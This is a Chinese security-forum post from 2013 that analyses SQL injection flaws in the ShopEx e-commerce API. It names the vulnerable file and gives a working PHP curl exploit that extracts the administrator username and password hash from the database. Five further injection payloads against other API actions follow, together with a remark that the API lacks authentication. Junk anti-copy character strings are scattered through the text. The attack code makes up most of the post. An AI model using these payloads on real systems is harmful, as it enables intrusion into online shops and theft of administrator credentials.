中国网络渗透测试联盟
标题:
shopEx最新版的API注入漏洞分析附利用exp
[打印本页]
作者:
admin
时间:
2013-7-27 18:34
标题:
shopEx最新版的API注入漏洞分析附利用exp
缺陷文件:\core\api\payment\2.0\api_b2b_2_0_payment_cfg.php
3 O1 C: j \+ t( s5 [
core\api\payment\1.0\api_b2b_2_0_payment_cfg.php
+ C' t1 q% V3 }; N* v' w6 V
1 o$ u+ ?3 k. M7 v+ b7 c
第44行 $data['columns'] 未做过滤导致注入
, T' m6 C: A: K# E$ _+ ?6 R
& J0 \8 a% ~" a2 _5 O/ r
<?php set_time_limit(0); ob_flush(); echo 'Test: http://localhost:808'."\r\n"; $sql = 'columns=* from sdb_payment_cfg WHERE 1 and (select 1 from(select count(*),concat((select (select (SELECT concat(username,0x7c,userpass) FROM sdb_operators limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#&disabled=1'; $url='http://localhost:808/api.php?act=search_payment_cfg_list&api_version=2.0'; $ch = curl_init(); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_URL,$url); curl_setopt($ch, CURLOPT_POSTFIELDS, $sql); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); flush(); $data = curl_exec($ch); echo $data; curl_close($ch); ?>外带一句 ShopEx对API操作的模块未做认证,任何用户都可访问,攻击者可通过它来对产品的分类,类型,规格,品牌等,进行添加,删除和修改,过滤不当还可造成注入.
( z6 S( B& G7 k8 f# F
0 d2 _; W! q3 t9 @
注射1:
* i6 W8 v1 M/ d q4 H. B5 [
7 v$ p/ o3 d& M" f% z& T# k6 f M
http://www.0day5.com/api.php
POST act=search_sub_regions&api_version=1.0&return_data=string&p_region_id=22 and (select 1 from(select count(*),concat(0x7c,(select (Select version()) from information_schema.tables limit 0,1),0x7c,floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)#
% I8 Y# e3 z0 I9 O3 u
: J) l3 P6 }* p) r7 U% D8 r: X
注射2:
0 G E4 F- Q+ O* F7 Q
http://www.0day5.com/shopex/api.php
act=add_category&api_version=3.1&datas={"name":"name' and 1=x %23"}
9 o% U, g1 i( Y7 r" W) s$ n
$ i$ z+ ~) @7 F8 x+ w& c
注射3:
: Q8 ^; n+ Q5 v/ g* |
http://www.0day5.com/shopex/api.php
act=get_spec_single&api_version=3.1&spec_id=1 xxx
* v, H% K. H* [1 p# u
注射4:
9 ^0 h3 C5 q& R( A: ?- e
8 @9 }; g; P8 d7 m0 R
http://www.0day5.com/shopex/api.php
act=online_pay_center&api_version=1.0&order_id=1x&pay_id=1¤cy=1
; S. a# c8 @, y1 M+ l1 X4 O; I% e6 a
7 }7 Q9 W% G: U! P; j5 a
8 O; w6 X6 _4 F0 `9 q
注射5:
* A9 b! e) d* d( d
http://www.0day5.com/shopex/api.php
act=search_dly_h_area&return_data=string&columns=xxxxx
7 I- a) C% _! V
1 Z9 s s- s5 G' [# i
: R$ ]. N5 j$ N* @9 `. j
: @; l! w( B) q9 x; _
7 u/ M: T0 Z1 U
/ W- I6 R0 l/ `% }
, ~7 ?" t* E( }' O$ j/ Z, H# Z) U7 |" y
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2